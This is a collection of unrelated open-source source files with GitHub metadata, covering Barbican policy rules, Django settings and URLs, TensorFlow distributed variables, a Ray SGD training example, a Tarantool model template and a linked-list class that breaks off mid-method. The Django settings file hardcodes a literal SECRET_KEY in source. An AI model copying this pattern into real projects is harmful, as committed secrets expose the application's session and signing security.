check_str='rule:admin and project_id:%(target.order.project_id)s',
deprecated_reason=base.LEGACY_POLICY_DEPRECATION,
deprecated_since=versionutils.deprecated.WALLABY
)
rules = [
policy.DocumentedRuleDefault(
name='orders:get',
check_str="True:%(enforce_new_defaults)s and role:member",
scope_types=['project'],
description='Gets list of all orders associated with a project.',
operations=[
{
'path': '/v1/orders',
'method': 'GET'
}
],
deprecated_rule=deprecated_orders_get
),
policy.DocumentedRuleDefault(
name='orders:post',
check_str="True:%(enforce_new_defaults)s and role:member",
scope_types=['project'],
description='Creates an order.',
operations=[
{
'path': '/v1/orders',
'method': 'POST'
}
],
deprecated_rule=deprecated_orders_post
),
policy.DocumentedRuleDefault(
name='orders:put',
check_str="True:%(enforce_new_defaults)s and role:member",
scope_types=['project'],
description='Unsupported method for the orders API.',
operations=[
{
'path': '/v1/orders',
'method': 'PUT'
}
],
deprecated_rule=deprecated_orders_put
),
policy.DocumentedRuleDefault(
name='order:get',
check_str=(
"True:%(enforce_new_defaults)s and "
"rule:order_project_member"),
scope_types=['project'],
description='Retrieves an orders metadata.',
operations=[
{
'path': '/v1/orders/{order-id}',
'method': 'GET'
}
],
deprecated_rule=deprecated_order_get
),
policy.DocumentedRuleDefault(
name='order:delete',
check_str=(
"True:%(enforce_new_defaults)s and "
"rule:order_project_member"),
scope_types=['project'],
description='Deletes an order.',
operations=[
{
'path': '/v1/orders/{order-id}',
'method': 'DELETE'
}
],
deprecated_rule=deprecated_order_delete
)
]
def list_rules():
return rules
|
{
"content_hash": "c2f92b9ae780d9a9ea81ea80050acdd4",
"timestamp": "",
"source": "github",
"line_count": 113,
"max_line_length": 74,
"avg_line_length": 30.336283185840706,
"alnum_prop": 0.5974329054842473,
"repo_name": "openstack/barbican",
"id": "fe921ac379026954478a520dbfd2fbc0d40dcc69",
"size": "3983",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "barbican/common/policies/orders.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "API Blueprint",
"bytes": "1586"
},
{
"name": "Mako",
"bytes": "979"
},
{
"name": "Python",
"bytes": "2626403"
},
{
"name": "Shell",
"bytes": "43567"
}
],
"symlink_target": ""
}
|
from djangoappengine.settings_base import *
import os
SECRET_KEY = '=r-$b*8hglm+858&9t043hlm6-&6-3d3vfc4((7yd0dbrakhvi'
INSTALLED_APPS = (
# 'django.contrib.admin',
'django.contrib.contenttypes',
'django.contrib.auth',
'django.contrib.sessions',
'django.contrib.sites',
'djangotoolbox',
# djangoappengine should come last, so it can override a few manage.py commands
'djangoappengine',
)
MIDDLEWARE_CLASSES = (
'django.middleware.common.CommonMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
)
TEMPLATE_CONTEXT_PROCESSORS = (
'django.contrib.auth.context_processors.auth',
'django.core.context_processors.request',
'django.core.context_processors.media',
)
# This test runner captures stdout and associates tracebacks with their
# corresponding output. Helps a lot with print-debugging.
TEST_RUNNER = 'djangotoolbox.test.CapturingTestSuiteRunner'
ADMIN_MEDIA_PREFIX = '/media/admin/'
TEMPLATE_DIRS = (os.path.join(os.path.dirname(__file__), 'templates'),)
ROOT_URLCONF = 'urls'
SITE_ID = 29
# Activate django-dbindexer if available
try:
import dbindexer
DATABASES['native'] = DATABASES['default']
DATABASES['default'] = {'ENGINE': 'dbindexer', 'TARGET': 'native'}
INSTALLED_APPS += ('dbindexer',)
DBINDEXER_SITECONF = 'dbindexes'
MIDDLEWARE_CLASSES = ('dbindexer.middleware.DBIndexerMiddleware',) + \
MIDDLEWARE_CLASSES
except ImportError:
pass
|
{
"content_hash": "7a5d83fce88cabd7f8c3cc394b00f460",
"timestamp": "",
"source": "github",
"line_count": 52,
"max_line_length": 83,
"avg_line_length": 29.673076923076923,
"alnum_prop": 0.7135450421257291,
"repo_name": "tjsavage/djangononrel-starter",
"id": "2d3b9a6ddc374b313e7330ae87692da92008a83f",
"size": "1733",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "settings.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "JavaScript",
"bytes": "91717"
},
{
"name": "Python",
"bytes": "4019683"
}
],
"symlink_target": ""
}
|
"""
比赛相关urls配置
"""
from django.conf.urls import patterns, url
urlpatterns = patterns(
'apps.game.views',
url('^createFixtures$', 'createFixtures'),
url('^getGame$', 'getGame'),
url('^editGame$', 'editGame'),
url('^deleteGame$', 'deleteGame'),
url('^saveFixtures$', 'saveFixtures'),
url('^fixtures$', 'getFixtures'),
url('^uploadData$', 'uploadData'),
)
|
{
"content_hash": "078c8849d7cd0364f696a8e91e5cd260",
"timestamp": "",
"source": "github",
"line_count": 16,
"max_line_length": 46,
"avg_line_length": 24.1875,
"alnum_prop": 0.6175710594315246,
"repo_name": "zWingz/webbasketball",
"id": "13b90d0226408a44ae991f3c6ce33a00cf7427ce",
"size": "468",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "apps/game/urls.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "50498"
},
{
"name": "HTML",
"bytes": "170566"
},
{
"name": "JavaScript",
"bytes": "30741"
},
{
"name": "Python",
"bytes": "106971"
}
],
"symlink_target": ""
}
|
from __future__ import unicode_literals
import pytest
from httoop.exceptions import InvalidLine
def test_response_protocol_with_http1_0_request_():
pass
def test_request_protocol_with_invalid_name(request_):
with pytest.raises(InvalidLine):
request_.protocol.parse(b'HTCPCP/1.1')
|
{
"content_hash": "6a0d8bcf237c6aa721933d89dd119528",
"timestamp": "",
"source": "github",
"line_count": 14,
"max_line_length": 54,
"avg_line_length": 20.714285714285715,
"alnum_prop": 0.7724137931034483,
"repo_name": "spaceone/httoop",
"id": "d68639ca0bcc80caf284db9977558f0c9e315292",
"size": "290",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "tests/messaging/test_request_protocol.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "HTML",
"bytes": "384542"
},
{
"name": "Makefile",
"bytes": "203"
},
{
"name": "Python",
"bytes": "1369577"
},
{
"name": "Shell",
"bytes": "199"
}
],
"symlink_target": ""
}
|
if __name__ == "__main__":
# needs to be run from the root of the repository
from bllipparser import RerankingParser, Tree
rrp = RerankingParser()
rrp.load_parser_model('first-stage/DATA/EN', terms_only=True)
tree1 = Tree('''(S1 (INTJ (UH Oh) (JJ sure) (. !)))''')
tree2 = Tree('''(S1 (FRAG (INTJ (UH Oh) (INTJ (JJ sure))) (. !)))''')
print tree1.evaluate(tree2)
print tree2.evaluate(tree1)
|
{
"content_hash": "3469377c80f1d388360b14b4fc3fd177",
"timestamp": "",
"source": "github",
"line_count": 14,
"max_line_length": 73,
"avg_line_length": 30.571428571428573,
"alnum_prop": 0.6004672897196262,
"repo_name": "dmcc/bllip-parser",
"id": "33543655b517b4765d032a91599324fb5f061c9c",
"size": "975",
"binary": false,
"copies": "3",
"ref": "refs/heads/master",
"path": "python/examples/evaluate.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Assembly",
"bytes": "406"
},
{
"name": "C",
"bytes": "682774"
},
{
"name": "C++",
"bytes": "2188548"
},
{
"name": "Common Lisp",
"bytes": "1233"
},
{
"name": "GAP",
"bytes": "35887650"
},
{
"name": "Java",
"bytes": "9098"
},
{
"name": "Lex",
"bytes": "16820"
},
{
"name": "M",
"bytes": "876"
},
{
"name": "Makefile",
"bytes": "51245"
},
{
"name": "Objective-C",
"bytes": "2633"
},
{
"name": "Perl6",
"bytes": "484"
},
{
"name": "Python",
"bytes": "254799"
},
{
"name": "Rebol",
"bytes": "1217"
},
{
"name": "Ruby",
"bytes": "195"
},
{
"name": "Shell",
"bytes": "20258"
}
],
"symlink_target": ""
}
|
"""Various classes representing distributed values."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import copy
import weakref
from tensorflow.python.distribute import device_util
from tensorflow.python.distribute import tpu_util
from tensorflow.python.distribute import values_util
from tensorflow.python.eager import context
from tensorflow.python.framework import ops
from tensorflow.python.ops import control_flow_ops
from tensorflow.python.ops import resource_variable_ops
from tensorflow.python.ops import variables as variables_lib
# pylint: disable=protected-access
class _DummyResourceDeleter(object):
pass
class DistributedVariable(resource_variable_ops.BaseResourceVariable):
"""Represents variables that are replicated.
It behaves exactly as a normal variable, but uses corresponding variable
handle based on the context.
- In each replica, it uses the handle from that replica.
- In tpu.replicate(), it uses the replicated handle.
- Otherwise, it uses the handle from the primary replica.
Note that it doesn't synchronize automatically as the old DistributedVariable
in values.py.
"""
def __init__(self, variables, *, enable_packed_handle=False):
if enable_packed_handle and not ops.executing_eagerly_outside_functions():
raise ValueError(
"Argument `enable_packed_handle` is true, but packed handle is only "
"supported in eager mode. Please make sure eager execution is "
"enabled.")
self._variables = variables
if enable_packed_handle:
self._packed_handle = ops.pack_eager_tensors(
[v.handle for v in variables])
else:
self._packed_handle = None
for v in variables:
v._distributed_container = weakref.ref(self) # pylint: disable=protected-access
self._device_to_handle = {v.device: v.handle for v in variables}
self._primary_handle = variables[0].handle
with ops.init_scope(), \
ops.name_scope("DistributedVariable", skip_on_eager=False) as name:
handle_name = ops.name_from_scope_name(name)
self._unique_id = "%s_%d" % (handle_name, ops.uid())
if context.executing_eagerly():
initial_value = None
initializer = None
else:
initial_value = variables[0].initial_value
initializer = control_flow_ops.group([v.initializer for v in variables])
super().__init__(
trainable=variables[0].trainable,
shape=variables[0].shape,
dtype=variables[0].dtype,
handle=None,
synchronization=variables[0].synchronization,
constraint=variables[0].constraint,
aggregation=variables[0].aggregation,
distribute_strategy=variables[0]._distribute_strategy,
name=variables[0].name,
unique_id=self._unique_id,
handle_name=handle_name,
graph_element=variables[0]._graph_element,
initial_value=initial_value,
initializer_op=initializer,
is_initialized_op=None,
cached_value=None,
handle_deleter=_DummyResourceDeleter(),
caching_device=None,
is_variables=True)
@property
def handle(self):
if values_util.is_saving_non_distributed():
return self._primary_handle
tpu_context = tpu_util.enclosing_tpu_context()
if tpu_context and not context.executing_eagerly():
is_mirrored = (
self._variables[0].synchronization !=
variables_lib.VariableSynchronization.ON_READ)
if self._packed_handle is None:
handles = [v.handle for v in self._variables]
is_packed = False
else:
handles = [self._packed_handle]
is_packed = True
return tpu_context.get_replicated_var_handle(self._unique_id, handles,
is_mirrored, is_packed)
if self._packed_handle is not None and not context.executing_eagerly():
return self._packed_handle
device = device_util.canonicalize(device_util.current())
return self._device_to_handle.get(device, self._primary_handle)
@property
def name(self):
if values_util.is_saving_non_distributed():
return self._variables[0].name
return super().name
@property
def initializer(self):
if values_util.is_saving_non_distributed():
return self._variables[0].initializer
return super().initializer
def _lazy_read(self, op):
# Lazy read is not supported.
with ops.control_dependencies([op]):
return self.read_value()
# Begin overrides of read/write methods to satisfy the requirement of using
# packed handle, i.e. there must be explicit device annotations.
def _device_scope(self):
if (self._packed_handle is None or
values_util.is_saving_non_distributed() or
tpu_util.enclosing_tpu_context() is not None):
return ops.NullContextmanager()
device = device_util.canonicalize(device_util.current())
if device in self._device_to_handle:
return ops.NullContextmanager()
return ops.device(self._primary_handle.device)
def value(self):
# We always force a read_value() instead of using the cached_value, as
# value() can be called on different devices.
return self.read_value()
def read_value(self):
with self._device_scope():
return super().read_value()
def assign_sub(self, delta, use_locking=None, name=None, read_value=True):
with self._device_scope():
return super().assign_sub(delta, use_locking, name, read_value)
def assign_add(self, delta, use_locking=None, name=None, read_value=True):
with self._device_scope():
return super().assign_add(delta, use_locking, name, read_value)
def assign(self, value, use_locking=None, name=None, read_value=True):
with self._device_scope():
return super().assign(value, use_locking, name, read_value)
def scatter_sub(self, sparse_delta, use_locking=False, name=None):
with self._device_scope():
return super().scatter_sub(sparse_delta, use_locking, name)
def scatter_add(self, sparse_delta, use_locking=False, name=None):
with self._device_scope():
return super().scatter_add(sparse_delta, use_locking, name)
def scatter_mul(self, sparse_delta, use_locking=False, name=None):
with self._device_scope():
return super().scatter_mul(sparse_delta, use_locking, name)
def scatter_div(self, sparse_delta, use_locking=False, name=None):
with self._device_scope():
return super().scatter_div(sparse_delta, use_locking, name)
def scatter_min(self, sparse_delta, use_locking=False, name=None):
with self._device_scope():
return super().scatter_min(sparse_delta, use_locking, name)
def scatter_max(self, sparse_delta, use_locking=False, name=None):
with self._device_scope():
return super().scatter_max(sparse_delta, use_locking, name)
def scatter_update(self, sparse_delta, use_locking=False, name=None):
with self._device_scope():
return super().scatter_update(sparse_delta, use_locking, name)
def batch_scatter_update(self, sparse_delta, use_locking=False, name=None):
with self._device_scope():
return super().batch_scatter_update(sparse_delta, use_locking, name)
def scatter_nd_sub(self, indices, updates, name=None):
with self._device_scope():
return super().scatter_nd_sub(indices, updates, name)
def scatter_nd_add(self, indices, updates, name=None):
with self._device_scope():
return super().scatter_nd_add(indices, updates, name)
def scatter_nd_update(self, indices, updates, name=None):
with self._device_scope():
return super().scatter_nd_update(indices, updates, name)
def sparse_read(self, indices, name=None):
with self._device_scope():
return super().sparse_read(indices, name)
def gather_nd(self, indices, name=None):
with self._device_scope():
return super().gather_nd(indices, name)
def to_proto(self, export_scope=None):
del self
raise TypeError("DistributedVariable doesn't support to_proto")
@staticmethod
def from_proto(variable_def, import_scope=None):
raise TypeError("DistributedVariable doesn't support from_proto")
def _as_graph_element(self):
if ops.get_default_graph().finalized:
return self._variables[0]._graph_element
return self.read_value()
def _strided_slice_assign(self, *args, **kwargs):
with self._device_scope():
return super()._strided_slice_assign(*args, **kwargs)
def __str__(self):
debug_str = ",\n".join(
" %d: %s" % (i, v) for i, v in enumerate(self._variables))
return "%s:{\n%s\n}" % (self.__class__.__name__, debug_str)
def __repr__(self):
debug_repr = ",\n".join(
" %d: %r" % (i, v) for i, v in enumerate(self._variables))
return "%s:{\n%s\n}" % (self.__class__.__name__, debug_repr)
def __deepcopy__(self, memo):
copied_variables = copy.deepcopy(self._variables, memo)
return DistributedVariable(
copied_variables, enable_packed_handle=self._packed_handle is not None)
def _tensor_conversion(var, dtype=None, name=None, as_ref=False):
if as_ref:
raise ValueError(
"You may be using variable created under distribute strategy in TF "
"1.x control flows. Try explicitly converting the variable to Tensor "
"using variable.read_value(), or switch to TF 2.x.")
return ops.convert_to_tensor(
var.read_value(), dtype=dtype, name=name, as_ref=as_ref)
ops.register_tensor_conversion_function(DistributedVariable, _tensor_conversion)
|
{
"content_hash": "5140bf38f08d368988d1f18f8ef79fee",
"timestamp": "",
"source": "github",
"line_count": 255,
"max_line_length": 86,
"avg_line_length": 37.63529411764706,
"alnum_prop": 0.6787537772220485,
"repo_name": "frreiss/tensorflow-fred",
"id": "26b46185eda9e3ee77ad678ef36ab49161b34eb7",
"size": "10286",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "tensorflow/python/distribute/values_v2.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Assembly",
"bytes": "6729"
},
{
"name": "Batchfile",
"bytes": "49527"
},
{
"name": "C",
"bytes": "871761"
},
{
"name": "C#",
"bytes": "8562"
},
{
"name": "C++",
"bytes": "79093233"
},
{
"name": "CMake",
"bytes": "6500"
},
{
"name": "Dockerfile",
"bytes": "110545"
},
{
"name": "Go",
"bytes": "1852128"
},
{
"name": "HTML",
"bytes": "4686483"
},
{
"name": "Java",
"bytes": "961600"
},
{
"name": "Jupyter Notebook",
"bytes": "549457"
},
{
"name": "LLVM",
"bytes": "6536"
},
{
"name": "MLIR",
"bytes": "1644156"
},
{
"name": "Makefile",
"bytes": "62398"
},
{
"name": "Objective-C",
"bytes": "116558"
},
{
"name": "Objective-C++",
"bytes": "303063"
},
{
"name": "PHP",
"bytes": "20523"
},
{
"name": "Pascal",
"bytes": "3982"
},
{
"name": "Pawn",
"bytes": "18876"
},
{
"name": "Perl",
"bytes": "7536"
},
{
"name": "Python",
"bytes": "40003007"
},
{
"name": "RobotFramework",
"bytes": "891"
},
{
"name": "Roff",
"bytes": "2472"
},
{
"name": "Ruby",
"bytes": "7464"
},
{
"name": "Shell",
"bytes": "681596"
},
{
"name": "Smarty",
"bytes": "34740"
},
{
"name": "Swift",
"bytes": "62814"
},
{
"name": "Vim Snippet",
"bytes": "58"
}
],
"symlink_target": ""
}
|
from .css import CssFormat
from .cocos2d import Cocos2dFormat
from .img import ImageFormat
from .html import HtmlFormat
from .jsonformat import JSONFormat
from .caat import CAATFormat
from .less import LessFormat
from .scss import ScssFormat
formats = {'css': CssFormat,
'cocos2d': Cocos2dFormat,
'img': ImageFormat,
'html': HtmlFormat,
'json': JSONFormat,
'caat': CAATFormat,
'less': LessFormat,
'scss': ScssFormat}
|
{
"content_hash": "c20bd14a3ede703fa2346e1a98eee46e",
"timestamp": "",
"source": "github",
"line_count": 18,
"max_line_length": 36,
"avg_line_length": 27.555555555555557,
"alnum_prop": 0.655241935483871,
"repo_name": "beni55/glue",
"id": "1fd72d86f834de7ca3cebe652724e551d04b25bd",
"size": "496",
"binary": false,
"copies": "4",
"ref": "refs/heads/master",
"path": "glue/formats/__init__.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "Python",
"bytes": "152912"
},
{
"name": "Shell",
"bytes": "81"
}
],
"symlink_target": ""
}
|
from js9 import j
import os
import capnp
# import msgpack
import base64
ModelBaseCollection = j.data.capnp.getModelBaseClassCollection()
ModelBase = j.data.capnp.getModelBaseClass()
# from JumpScale9.clients.tarantool.KVSInterface import KVSTarantool
class $NameModel(ModelBase):
'''
'''
def __init__(self):
ModelBase.__init__(self)
def index(self):
#no need to put indexes because will be done by capnp
pass
def save(self):
self.reSerialize()
self._pre_save()
buff = self.dbobj.to_bytes()
key=self.key
# key=msgpack.dumps(self.key)
# key=base64.b64encode(self.key.encode())
return self.collection.client.call("model_$name_set",(key,buff))
def delete(self):
key=self.key
# key=base64.b64encode(self.key.encode())
return self.collection.client.call("model_$name_del",(key))
class $NameCollection(ModelBaseCollection):
'''
This class represent a collection of $Names
It's used to list/find/create new Instance of $Name Model object
'''
def __init__(self):
category = '$name'
namespace = ""
# instanciate the KVS interface on top of tarantool
# cl = j.clients.tarantool.client_get() # will get the tarantool from the config file, the main connection
# db = KVSTarantool(cl, category)
# mpath = j.sal.fs.getDirName(os.path.abspath(__file__)) + "/model.capnp"
# SchemaCapnp = j.data.capnp.getSchemaFromPath(mpath, name='$Name')
self.client = j.clients.tarantool.client_get() #will get the tarantool from the config file, the main connection
mpath=j.sal.fs.getDirName(os.path.abspath(__file__))+"/model.capnp"
SchemaCapnp=j.data.capnp.getSchemaFromPath(mpath,name='$Name')
super().__init__(SchemaCapnp, category=category, namespace=namespace, modelBaseClass=$NameModel, db=self.client, indexDb=self.client)
self.client.db.encoding=None
def new(self):
return $NameModel(collection=self, new=True)
def get(self,key):
resp=self.client.call("model_$name_get",key)
if len(resp.data) <= 1 and len(resp.data[0]) > 2:
raise KeyError("value for %s not found" % key)
value = resp.data[0][1]
return $NameModel(key=key,collection=self, new=False,data=value)
# BELOW IS ALL EXAMPLE CODE WHICH NEEDS TO BE REPLACED
def list(self):
resp=self.client.call("model_$name_list")
return [item.decode() for item in resp[0]]
# def list(self, actor="", service="", action="", state="", serviceKey="", fromEpoch=0, toEpoch=9999999999999,tags=[]):
# raise NotImplementedError()
# return res
# def find(self, actor="", service="", action="", state="", serviceKey="", fromEpoch=0, toEpoch=9999999999999, tags=[]):
# raise NotImplementedError()
# res = []
# for key in self.list(actor, service, action, state, serviceKey, fromEpoch, toEpoch, tags):
# if self.get(key):
# res.append(self.get(key))
# return res
|
{
"content_hash": "b1af48ab1f892c44593875756392bfeb",
"timestamp": "",
"source": "github",
"line_count": 88,
"max_line_length": 141,
"avg_line_length": 36.18181818181818,
"alnum_prop": 0.6187185929648241,
"repo_name": "Jumpscale/core9",
"id": "0311578069a8a5a7f7d3c85c04e1762e92ca9f2e",
"size": "3184",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "JumpScale9/clients/tarantool/templates/python/model.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Cap'n Proto",
"bytes": "7695"
},
{
"name": "Lua",
"bytes": "31125"
},
{
"name": "Python",
"bytes": "1171144"
},
{
"name": "Shell",
"bytes": "42008"
}
],
"symlink_target": ""
}
|
import pytest
import numpy as np
from skimage.external.tifffile import imread
from canon.img.subtract_bg import subtract
from .. import resource
def test_subtract():
image = imread(resource('test00001.tiff'))
img_sub = subtract(image, 0.001)
# subtracting background should reduce max intensity
assert np.max(img_sub) <= np.max(image)
# subtracting background should raise min intensity
assert np.min(img_sub) >= np.min(image)
if __name__ == '__main__':
pytest.main()
|
{
"content_hash": "b668cec10c3596831c1b59b03d7ee8f5",
"timestamp": "",
"source": "github",
"line_count": 18,
"max_line_length": 56,
"avg_line_length": 27.77777777777778,
"alnum_prop": 0.706,
"repo_name": "structrans/Canon",
"id": "5747d0a26e4b9f540f6704069b1117b502783198",
"size": "500",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "test/img/test_subtract.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "56015"
}
],
"symlink_target": ""
}
|
from random import shuffle, randint
from itertools import islice
from django.views.generic import TemplateView
from chartjs.colors import next_color, COLORS
from chartjs.views.lines import BaseLineChartView
class ColorsView(TemplateView):
template_name = 'colors.html'
def get_context_data(self, **kwargs):
data = super(ColorsView, self).get_context_data(**kwargs)
data['colors'] = islice(next_color(), 0, 50)
return data
class LineChartJSONView(BaseLineChartView):
def get_labels(self):
"""Return 7 labels."""
return ["January", "February", "March", "April", "May", "June", "July"]
def get_data(self):
"""Return 3 random dataset to plot."""
def data():
"""Return 7 randint between 0 and 100."""
return [randint(0, 100) for x in range(7)]
return [data() for x in range(3)]
def get_colors(self):
"""Return a new shuffle list of color so we change the color
each time."""
colors = COLORS[:]
shuffle(colors)
return next_color(colors)
# Pre-configured views.
colors = ColorsView.as_view()
line_chart = TemplateView.as_view(template_name='line_chart.html')
line_chart_json = LineChartJSONView.as_view()
|
{
"content_hash": "02b6ae41a0f97d6b0d0716e7e38249f8",
"timestamp": "",
"source": "github",
"line_count": 43,
"max_line_length": 79,
"avg_line_length": 29.25581395348837,
"alnum_prop": 0.6470588235294118,
"repo_name": "brunobord/django-chartjs",
"id": "46f0851fcab4caea412302fc5d83546a809851a5",
"size": "1282",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "demo/demoproject/views.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "Python",
"bytes": "22323"
},
{
"name": "Shell",
"bytes": "222"
}
],
"symlink_target": ""
}
|
import numpy as np
import os
import torch
import torch.nn as nn
import argparse
from filelock import FileLock
from ray import tune
from ray.tune.schedulers import PopulationBasedTraining
from torch.utils.data import DataLoader, Subset
from torchvision.datasets import CIFAR10
import torchvision.transforms as transforms
import ray
from ray.tune import CLIReporter
from ray.util.sgd.torch import TorchTrainer, TrainingOperator
from ray.util.sgd.torch.resnet import ResNet18
from ray.util.sgd.utils import BATCH_SIZE, override
def initialization_hook():
# Need this for avoiding a connection restart issue on AWS.
os.environ["NCCL_SOCKET_IFNAME"] = "^docker0,lo"
os.environ["NCCL_LL_THRESHOLD"] = "0"
# set the below if needed
# print("NCCL DEBUG SET")
# os.environ["NCCL_DEBUG"] = "INFO"
class CifarTrainingOperator(TrainingOperator):
@override(TrainingOperator)
def setup(self, config):
# Create model.
model = ResNet18(config)
# Create optimizer.
optimizer = torch.optim.SGD(
model.parameters(),
lr=config.get("lr", 0.1),
momentum=config.get("momentum", 0.9))
# Load in training and validation data.
transform_train = transforms.Compose([
transforms.RandomCrop(32, padding=4),
transforms.RandomHorizontalFlip(),
transforms.ToTensor(),
transforms.Normalize((0.4914, 0.4822, 0.4465),
(0.2023, 0.1994, 0.2010)),
]) # meanstd transformation
transform_test = transforms.Compose([
transforms.ToTensor(),
transforms.Normalize((0.4914, 0.4822, 0.4465),
(0.2023, 0.1994, 0.2010)),
])
with FileLock(".ray.lock"):
train_dataset = CIFAR10(
root="~/data",
train=True,
download=True,
transform=transform_train)
validation_dataset = CIFAR10(
root="~/data",
train=False,
download=False,
transform=transform_test)
if config.get("test_mode"):
train_dataset = Subset(train_dataset, list(range(64)))
validation_dataset = Subset(validation_dataset, list(range(64)))
train_loader = DataLoader(
train_dataset, batch_size=config[BATCH_SIZE], num_workers=2)
validation_loader = DataLoader(
validation_dataset, batch_size=config[BATCH_SIZE], num_workers=2)
# Create loss.
criterion = nn.CrossEntropyLoss()
self.model, self.optimizer, self.criterion = \
self.register(models=model, optimizers=optimizer,
criterion=criterion,)
self.register_data(
train_loader=train_loader, validation_loader=validation_loader)
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument(
"--address",
required=False,
type=str,
help="the address to use for Redis")
parser.add_argument(
"--server-address",
type=str,
default=None,
required=False,
help="The address of server to connect to if using "
"Ray Client.")
parser.add_argument(
"--num-workers",
"-n",
type=int,
default=1,
help="Sets number of workers for training.")
parser.add_argument(
"--num-epochs", type=int, default=5, help="Number of epochs to train.")
parser.add_argument(
"--use-gpu",
action="store_true",
default=False,
help="Enables GPU training")
parser.add_argument(
"--fp16",
action="store_true",
default=False,
help="Enables FP16 training. Requires `use-gpu`.")
parser.add_argument(
"--smoke-test",
action="store_true",
default=False,
help="Finish quickly for testing.")
parser.add_argument(
"--tune", action="store_true", default=False, help="Tune training")
args, _ = parser.parse_known_args()
if args.server_address:
ray.util.connect(args.server_address)
else:
ray.init(address=args.address, log_to_driver=True)
TorchTrainable = TorchTrainer.as_trainable(
training_operator_cls=CifarTrainingOperator,
initialization_hook=initialization_hook,
num_workers=args.num_workers,
config={
"test_mode": args.smoke_test, # whether to to subset the data
BATCH_SIZE: 128 * args.num_workers,
},
use_gpu=args.use_gpu,
use_fp16=args.fp16)
pbt_scheduler = PopulationBasedTraining(
time_attr="training_iteration",
metric="val_loss",
mode="min",
perturbation_interval=1,
hyperparam_mutations={
# distribution for resampling
"lr": lambda: np.random.uniform(0.001, 1),
# allow perturbations within this set of categorical values
"momentum": [0.8, 0.9, 0.99],
})
reporter = CLIReporter()
reporter.add_metric_column("val_loss", "loss")
reporter.add_metric_column("val_accuracy", "acc")
analysis = tune.run(
TorchTrainable,
num_samples=4,
config={
"lr": tune.choice([0.001, 0.01, 0.1]),
"momentum": 0.8
},
stop={"training_iteration": 2 if args.smoke_test else 100},
max_failures=3, # used for fault tolerance
checkpoint_freq=3, # used for fault tolerance
keep_checkpoints_num=1, # used for fault tolerance
verbose=2,
progress_reporter=reporter,
scheduler=pbt_scheduler)
print(analysis.get_best_config(metric="val_loss", mode="min"))
|
{
"content_hash": "422de5b835753043e01c0b2352900106",
"timestamp": "",
"source": "github",
"line_count": 177,
"max_line_length": 79,
"avg_line_length": 32.740112994350284,
"alnum_prop": 0.5958584987057809,
"repo_name": "pcmoritz/ray-1",
"id": "a79178c65652ebc8d50a600f3830b5e4099a4927",
"size": "5795",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "python/ray/util/sgd/torch/examples/cifar_pytorch_pbt.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "C",
"bytes": "70670"
},
{
"name": "C++",
"bytes": "4670851"
},
{
"name": "CSS",
"bytes": "10912"
},
{
"name": "Dockerfile",
"bytes": "14159"
},
{
"name": "HTML",
"bytes": "30414"
},
{
"name": "Java",
"bytes": "1338604"
},
{
"name": "JavaScript",
"bytes": "914"
},
{
"name": "Jupyter Notebook",
"bytes": "1615"
},
{
"name": "Makefile",
"bytes": "234"
},
{
"name": "Python",
"bytes": "10523389"
},
{
"name": "Shell",
"bytes": "117557"
},
{
"name": "Smarty",
"bytes": "239"
},
{
"name": "Starlark",
"bytes": "238506"
},
{
"name": "TypeScript",
"bytes": "259269"
}
],
"symlink_target": ""
}
|
from __future__ import absolute_import
from __future__ import print_function
from __future__ import division
from numpy import inf
class Node(object):
"""Node class as building block for linked list."""
def __init__(self, data):
self.data = data
self.next = None
class LinkedList(object):
"""Singly linked list class.
Operations include the following:
- is_empty()
- size()
- show()
- prepend(data)
- append(data)
- delete_with_data(data)
- insert(pos, data)
- pop(pos)
- search(data)
- index(data)
"""
def __init__(self):
self.head = None
def is_empty(self):
"""Check list is empty or not.
Time complexity: O(1).
Space complexity: O(1).
"""
return self.head is None
def size(self):
"""Obtain list size.
Time complexity: O(n).
Space complexity: O(1).
"""
current = self.head
counter = 0
while current:
counter += 1
current = current.next
return counter
def show(self):
"""Show the list.
Time complexity: O(n).
Space complexity: O(n).
"""
a_list = []
current = self.head
while current:
a_list.append(current.data)
current = current.next
print(a_list)
def prepend(self, data):
"""Prepend data to list head.
Time complexity: O(1).
Space complexity: O(1).
"""
new_head = Node(data)
new_head.next = self.head
self.head = new_head
return None
def append(self, data):
"""Append data to list tail.
Time complexity: O(n).
Space complexity: O(1).
"""
# If linked list is empty.
if not self.head:
self.head = Node(data)
return None
# If linked list exits, append new node after the tail node.
current = self.head
while current.next:
current = current.next
current.next = Node(data)
return None
def delete_with_data(self, data):
"""Remove data from list, if existed.
If pos is None, then pop the last item.
Time complexity: O(n).
Space complexity: O(1).
"""
if not self.head:
return None
if self.head.data == data:
# Skip deleted node.
self.head = self.head.next
return None
current = self.head
while current.next:
if current.next.data == data:
# Skip deleted node.
current.next = current.next.next
return None
else:
current = current.next
return None
def insert(self, pos, data):
"""Insert data to specified position of list.
Time complexity = O(pos).
Space complexity: O(1).
"""
if not self.head and pos > 0:
print('Cannot insert to empty list.')
return None
current = self.head
previous = None
counter = 0
if not self.head:
self.prepend(data)
while counter < pos and current.next:
previous = current
current = current.next
counter += 1
insert_node = Node(data)
insert_node.next = current
if pos == 0:
self.head = insert_node
else:
